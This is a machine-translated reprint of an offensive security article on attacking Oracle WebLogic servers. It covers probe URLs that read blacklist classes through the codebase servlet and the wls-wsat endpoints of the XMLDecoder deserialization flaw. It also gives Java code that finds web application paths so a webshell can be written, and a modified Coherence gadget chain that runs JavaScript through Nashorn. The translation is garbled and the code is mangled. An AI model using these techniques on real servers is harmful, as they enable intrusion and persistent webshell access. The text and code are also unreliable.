Shulou(Shulou.com)05/31 Report--

What are the methods of weblogic attacks? I believe many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Brief introduction

Weblogic servers are characterized by a large and complex architecture, blue teams are generally difficult to defend, and are mostly deployed in the external network. Moreover, the attack cost of weblogic is relatively low, as long as there are vulnerabilities, you can obtain the root permissions of the target server directly. In the offensive and defensive exercises by the major offensive teams, the defensive side focused on.

Of course, the various exp programs currently available online, including my own tools, are more or less problematic. So recently, at the request of friends, sorted out some of the attack methods and "perfect" use. Red teams can be used to improve their tools, and blue teams can be used to write traceability reports.

First, detect whether there are loopholes in weblogic.

At present, among the materials made public on the Internet, there is not a better way to judge whether there are loopholes in weblogic. Usually all kinds of tools are typed with exp, and if they succeed, there will be loopholes naturally, and if they fail, there will be no loopholes. Or, through the dnslog way to detect. These two methods are limited by various factors, resulting in a high proportion of false positives. It is also possible to trigger rules for honeypots, waf, and other security devices.

Of course, here I introduce an easier way to see if there are vulnerabilities, and that is to use the CODEBASE function of T3 RMI to check the blacklist of weblogic.

Codebase: simply put, codebase is the path to remotely loading classes. When the object sender serializes the object, the codebase information is appended to the serialized stream. This information tells the receiver where to find the execution code for the object.

So can we diverge our thinking, what if this class is the blacklist class of weblogic? And weblogic's codebase uses the http protocol to transport classes.

The way to use it is as follows. Use your browser and confirm that the other party is a weblogic server, and then url as follows

T3 deserialized blacklist http://xx:7001/bea_wls_internal/classes/weblogic/utils/io/oif/WebLogicFilterConfig.class

Xmldecoder blacklist http://192.168.119.130:8088//bea_wls_internal/classes/weblogic/wsee/workarea/WorkContextXmlInputAdapter.class

1.1T3 codebase analysis

In the code at weblogic.rjvm.InternalWebAppListener#contextInitialized, register the code that handles codebase, that is, the request path is classes

If (! server.isClasspathServletDisabled ()) {

ServletContext.addServlet ("classes", "weblogic.servlet.ClasspathServlet") .addMapping (new String [] {"/ classes/*"})

}

Let's take a look at the processing code for weblogic.servlet.ClasspathServlet, which is simply reading the class name and writing it to the http response.

Of course, is there an arbitrary file reading vulnerability here? The answer is yes, but there is a blacklist that forbids files with certain suffixes to be read. The blacklist is as follows

In theory, you can also use CODEBASE to read users' classes and download them locally for code analysis. The premise is that you need to know what the user's class name is. Of course, there is also a blacklist, which is as follows

2. Weblogic xmldecoder deserialization vulnerabilities

The loophole is not introduced too much, and we will not talk about the cause, principle and analysis of the loophole here.

Url for vulnerability detection

/ wls-wsat/CoordinatorPortType

RegistrationPortTypeRPC

ParticipantPortType

RegistrationRequesterPortType

CoordinatorPortType11

RegistrationPortTypeRPC11

ParticipantPortType11

RegistrationRequesterPortType11

I think the difficulties in exploiting this vulnerability are as follows.

1. There is only echo code on the Internet, but no code is used, such as memory horses.

two。 If you write about horses, you may encounter a problem with the path. The path of wenlogic is random, and the current open solution on the Internet is blasting.

3. How to find all the Context?

Let's solve them one by one, taking exp of weblogic 10.x as an example.

Xml payload of xmldecoder has done the following work

1. Call the weblogic.utils.Hex.fromHexString function to convert the hex-encoded class file to binary format

two。 Call the defineClass method of org.mozilla.classfile.DefiningClassLoader to load the above class file into the virtual machine

3. Call the newInstance method to generate an instance of the class added to JVM above

4. Call the method of the instance to complete the attack

Payload actually you know how to write xmldecoder just by looking at it, so I'm not going to repeat it here.

All the above questions actually boil down to one question, that is, how to find the context of all web applications under weblogic?

Here I expose a method that has been tested under weblogic 10 weblogic 12 and is not affected by the protocol, that is, as long as you can execute code in weblogic, I can get all the webcontext of weblogic. The code is as follows

Java.lang.reflect.Method m = Class.forName ("weblogic.t3.srvr.ServerRuntime") .getDeclaredMethod ("theOne")

M.setAccessible (true)

ServerRuntime serverRuntime = (ServerRuntime) m.invoke (null)

List list = new java.util.ArrayList ()

StringBuilder sb = new StringBuilder ()

For (weblogic.management.runtime.ApplicationRuntimeMBean applicationRuntime: serverRuntime.getApplicationRuntimes ()) {

Java.lang.reflect.Field childrenF = applicationRuntime.getClass () .getSuperclass () .getDeclaredField ("children")

ChildrenF.setAccessible (true)

Java.util.HashSet set= (java.util.HashSet) childrenF.get (applicationRuntime)

Java.util.Iterator iterator = set.iterator ()

While (iterator.hasNext ()) {

Object key = iterator.next ()

If (key.getClass (). GetName (). Equals ("weblogic.servlet.internal.WebAppRuntimeMBeanImpl")) {

Field contextF = key.getClass () .getDeclaredField ("context")

ContextF.setAccessible (true)

WebAppServletContext context = (WebAppServletContext) contextF.get (key)

List.add (context)

}

}

}

Returnlist;2.1 acquires random path

With the above code, after getting all the web context loaded by weblogic, we can call the context.getRootTempDir (). GetAbsolutePath () method to get the location of the directory and write to webshell.

My code is as follows

List contexts = findAllContext ()

Iterator I = contexts.iterator ()

StringBuilder sb = new StringBuilder ()

While (i.hasNext ()) {

WebAppServletContext context = i.next ()

Sb.append (String.format ("name% 30s\ turl% 30s\ tDocroot% s\ n", context.getAppName (), context.getContextPath (), context.getRootTempDir () .getAbsolutePath ()

}

Returnnew ByteArrayInputStream ((sb.toString ()) .getBytes ())

The screenshot is as follows

2.2 weblogic 12.x payload

There is no org.mozilla.classfile.DefiningClassLoader class in weblogic 12.x, and I don't really like this inflexible way to write exp. I'm going to do it another way here, and that is to call js through java.

Since JDK 1.8, Nashorn has replaced Rhino (JDK 1.6, JDK1.7) as the embedded JavaScript engine of Java. Nashorn fully supports the ECMAScript 5.1 specification and some extensions. It compiles JavaScript into Java bytecode using new language features based on JSR 292, including invokedynamic introduced in JDK 7.

Note that JVM of 1.5 and below is not supported

When java executes js, you can call any java object, method, class. It is important to note that java is a strongly typed language, while js is a weakly typed language, and js may sometimes code unexpected type conversions. We need to pay attention here.

Just change the code loaded with context to js. I'll post a screenshot here.

In nashorn, the default last variable is the return value of the call to this js

III. Weblogic T3 deserialization

Here I would like to recommend brother r4v3zn's weblogic-framework utility. Of course, there is a little bit of bug, but this is a very easy to use tool. Tool address https://github.com/0nise/weblogic-framework

For vulnerability detection, refer to the previous blacklist download method.

Of course, there are many holes in T3 deserialization, such as cve-2020-2555, which cannot execute arbitrary code similar to CC chain. at present, most of the peers are uploading a jar to the tmp directory or loading jar packages remotely through urlclassloader to deploy malicious code.

But we can still do arbitrary code execution indirectly by deserializing chain execution and calling nashorn.

On the other hand, the js we are going to execute calls the javaassist package through reflection to assemble a ClusterMasterRemote class and bind the JNDI instance for echo. The js code is as follows

Image-20210329124530132

Of course, the corherence gadget needs to be modified as follows

Private static ChainedExtractor getChainedExtractor () {

Returnnew ChainedExtractor (new ReflectionExtractor [] {

New ReflectionExtractor (

"newInstance", new Object [] {}

),

New ReflectionExtractor (

"getEngineByName", new Object [] {"nashorn"}

),

New ReflectionExtractor (

"eval", new Object [] {getJsCode ()}

)

});

} after reading the above, have you mastered the methods of weblogic attacks? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.